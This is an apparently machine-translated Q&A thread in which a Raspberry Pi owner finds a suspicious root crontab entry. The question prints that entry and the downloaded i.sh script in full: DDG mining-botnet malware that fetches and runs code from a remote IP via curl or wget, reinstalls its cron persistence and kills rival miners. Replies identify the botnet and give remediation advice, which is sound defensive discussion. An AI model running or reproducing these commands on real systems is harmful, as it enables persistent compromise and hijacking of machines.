Подозрительная запись в crontab, запускающая 'xribfa4' каждые 15 минут

59

Я хотел добавить что-то в мой корневой файл crontab на Raspberry Pi и нашел запись, которая мне кажется подозрительной, поиск ее частей в Google ничего не дал.

Запись в Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Содержание http://103.219.112.66:8000/i.sh:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Мои знания Linux ограничены, но мне кажется, что загрузка двоичных файлов с индонезийского сервера и регулярный запуск их с правами root не является чем-то обычным.

Что это? Что мне делать?

Питер Дам
источник
16
Это круглое. Каждые 15 минут он загружает и устанавливает новую копию себя. Если / когда копия на удаленном сервере будет изменена, все серверы, на которых выполняется этот cronjob, выполнят новый код в течение 15 минут.
подстановочный
5
Ваш малиновый пи открыт для интернета? Какой у тебя малиновый пи? Это единственный результат в Google, когда я ищу xribfa4. Если вы не используете программное обеспечение, которое должно это делать, то это скорее всего вирус.
Кемотеп
6
@kemotep эта строка случайная, но Google для IP, и она дает несколько результатов. Кое-что о бот-сети ddg-майнинга
frostschutz
9
Я нашел это. Это безумие, что IP зарегистрирован на сайте правительства Индонезии. Также похоже, что есть почти 2000 других ips, доставляющих эту полезную нагрузку.
Кемотеп
21
Главное, о чем вы должны знать, это то, что даже если вы удалите эту запись в crontab, ваша система, скорее всего, все еще будет иметь уязвимость, которая позволила ей заразиться. Вам нужно найти и исправить эту уязвимость.
Ганс-Мартин Моснер

Ответы:

79

Это ботнет DDG майнинга, как это работает:

  1. использование уязвимости RCE
  2. модификация crontab
  3. загрузка соответствующей программы майнинга (написана с помощью go)
  4. начало процесса добычи

DDG: горный ботнет, нацеленный на серверы баз данных

SystemdMiner, когда ботнет заимствует инфраструктуру другого ботнета

U & L: Как я могу уничтожить вредоносное ПО на экземпляре AWS EC2? (скомпрометированный сервер)

GAD3R
источник
4
Да, на самом деле кажется, что это так. Благодарность! Отметит это как ответ, если ничего нового не придет.
Питер Дэм
8
Не забывайте обычный совет для укоренившейся машины: попытайтесь выяснить, как они попали, чтобы вы могли исправить дыру. Учитесь на этом и повышайте свою безопасность. Наконец, обстреляйте и переустановите машину.
marcelm
3
Хорошей новостью является то, что у них, похоже, нет майнера для Pi, только для i686 и x86_64.
Марк
13
@ Марк Как это хорошие новости? Кто-то получил полный контроль над своим Пи, используя неизвестную точку входа, и имел полный доступ к любым секретам Пи (включая, но не ограничиваясь паролями). Работает ли майнер на самом деле в области «небольших неудобств».
marcelm
4
@marcelm, злоумышленник получил полный контроль над ним, а затем почти наверняка не сделал ничего существенного с этим контролем.
Марк
2

Выясните, какие порты TCP и UDP действительно необходимы, а затем заблокируйте все остальные порты в брандмауэре вашего маршрутизатора. Возможно , эти записи в crontab не появятся снова.

Вы можете увидеть, какие порты открыты и общедоступны с помощью Shields Up! особенность на grc.com .

Майк Уотерс
источник
5
Или он мог бы исправить уязвимость.
Харпер - Восстановить Монику
1
@ Харпер Абсолютно! Это дано. Я думал, что, возможно, не блокируя сначала неиспользуемые порты, он может заразиться, пока он пытается его исправить.
Майк Уотерс
1
Соответствующий комментарий от security.SE: security.stackexchange.com/questions/147770/…
Подстановочный
1
Это (не ограничиваясь только TCP и UDP), всегда. Ака позитивная модель безопасности, белый список или запрет по умолчанию - запрещение всего трафика, который вы явно не используете или не нуждаетесь - единственный способ убедиться, что ни одна из ваших дыр не подвергается проникновению.
Антихрис